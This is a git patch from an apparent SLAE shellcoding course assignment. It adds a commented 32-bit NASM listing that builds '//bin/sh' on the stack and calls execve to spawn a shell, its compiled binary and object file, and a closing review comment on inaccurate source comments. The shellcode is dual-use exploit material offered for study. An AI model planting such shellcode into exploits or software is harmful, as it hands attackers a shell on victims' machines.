From 3ff2c81673203b72d70160990994abd0db855909 Mon Sep 17 00:00:00 2001
From: arno01
Date: Thu, 7 Mar 2013 23:19:59 +0100
Subject: [PATCH] SLAE Assignment #1
---
 exam1/execve-stack | Bin 0 -> 530 bytes
 exam1/execve-stack.nasm | 57 ++++++++++++++++++++++++++++++++++++++++
 exam1/execve-stack.o | Bin 0 -> 464 bytes
 3 files changed, 57 insertions(+)
 create mode 100755 exam1/execve-stack
 create mode 100644 exam1/execve-stack.nasm
 create mode 100644 exam1/execve-stack.o
diff --git a/exam1/execve-stack b/exam1/execve-stack
new file mode 100755
index 0000000000000000000000000000000000000000..9731f409c35df01d7669142bc93286939d46d6e4
GIT binary patch
literal 530
zcmb<-^>JflWMqH=CI)5(5HF#Dg~J3$uYgLJFem`UH5gbKn85O2VW1iYAZ`J2K$sOI
zC;%c5!0^BZZo^AK8F~7}85#QeNtvCGgMvFB26a9<+W?efG`xMbfkCghGPfi#2}qX|
zLFfz^t0c9e1YsIsmNZZa$o*_U4Dv$)kX8X=7=SrX5GcS569m#A_bVdtL1useh-Lz_
zAVdLBpa95Z0b-DT5DhYu6UqltVDJE_&IrZ<(lGOogy2k&J3$;!$Rn#`Vfgr87$^>t
z7XZpi0r@QxAnFBx@@i;&T{J#JYDH>tS*mVvNn&!gUS48xE<-$!T~xvlAD>iQ3}dIJ
OB$gyH#HZ$^FaQ7yFGbA&
literal 0
HcmV?d00001
diff --git a/exam1/execve-stack.nasm b/exam1/execve-stack.nasm
new file mode 100644
index 0000000..35717d1
--- /dev/null
+++ b/exam1/execve-stack.nasm
@@ -0,0 +1,57 @@
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+ ;
+ ; =============================== EXECVE =====================================
+ ;
+ ; Now as we forwarded sockfd to a client, we can spawn shell.
+ ; Prepare the path, in little-endian, using the Python
+ ; >>> '//bin/sh'[::-1].encode('hex')
+ ; '68732f6e69622f2f'
+ ;
+ ; int execve(const char *filename, char *const argv[], char *const envp[]);
+ ; EAX EBX, ECX, EDX
+ ; 11 '//bin/sh' PTR to EBX NULL
+ ;
+ ;
+
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
+
+ ; === EXIT(0) ===
+ ; void _exit(int status);
+ ; /usr/include/asm/unistd_32.h:#define __NR_exit 1
+ xor eax, eax ; EAX = 0x000000
+ mov al, 1 ; EAX = 0x000001 1: exit syscall
+ xor ebx, ebx ; EBX = 0x000000 0: success status
+ int 0x80
+
+
+;section .data
diff --git a/exam1/execve-stack.o b/exam1/execve-stack.o
new file mode 100644
index 0000000000000000000000000000000000000000..0992e7ab831d6ec00309aba5db23d10409fae11c
GIT binary patch
literal 464
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBXf@FdKl+6yL
znUTaDfa(;H_#iVtKoE$LT~Yv)Z~%(205M2Ehz6M{3FQMRFxUW8Ck5jGX_$F1A;SY3
zxD77_W#s7>XJqK>CuMd%4hrsk7}WXbYy(h^(eU=!2AEnftyhv-QNo~CoKaj-RFaqk
zWL4%uXb2xgF(wDueinw0|B+RIVnP^6Kmg?0)QZ&PvQ*vTlEma}y}ZQYT!wfcyQl=J
F4ggd0E5`r;
literal 0
HcmV?d00001
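Review bot: The line `; Now as we forwarded sockfd to a client, we can spawn shell.` in the EXECVE comment block after `_start:` describes a socket descriptor that this file never creates or passes — there is no socket code anywhere in the hunk, so the sentence reads as a leftover from a different listing and sends the reader looking for a step that does not exist; replace it with `; Build '//bin/sh', a one-entry argv and an empty envp on the stack, then call execve.` The register table `; 11 '//bin/sh' PTR to EBX NULL` says EDX is NULL, but the code below does `mov edx, esp` after pushing a zero, so envp is actually a pointer to a NULL-terminated empty array; Linux accepts both, but the table should state what the code does, e.g. `; 11 '//bin/sh' PTR to argv PTR to empty envp`. The `=== EXIT(0) ===` block would also benefit from one sentence noting that it is reached only if execve fails, since a successful execve never returns.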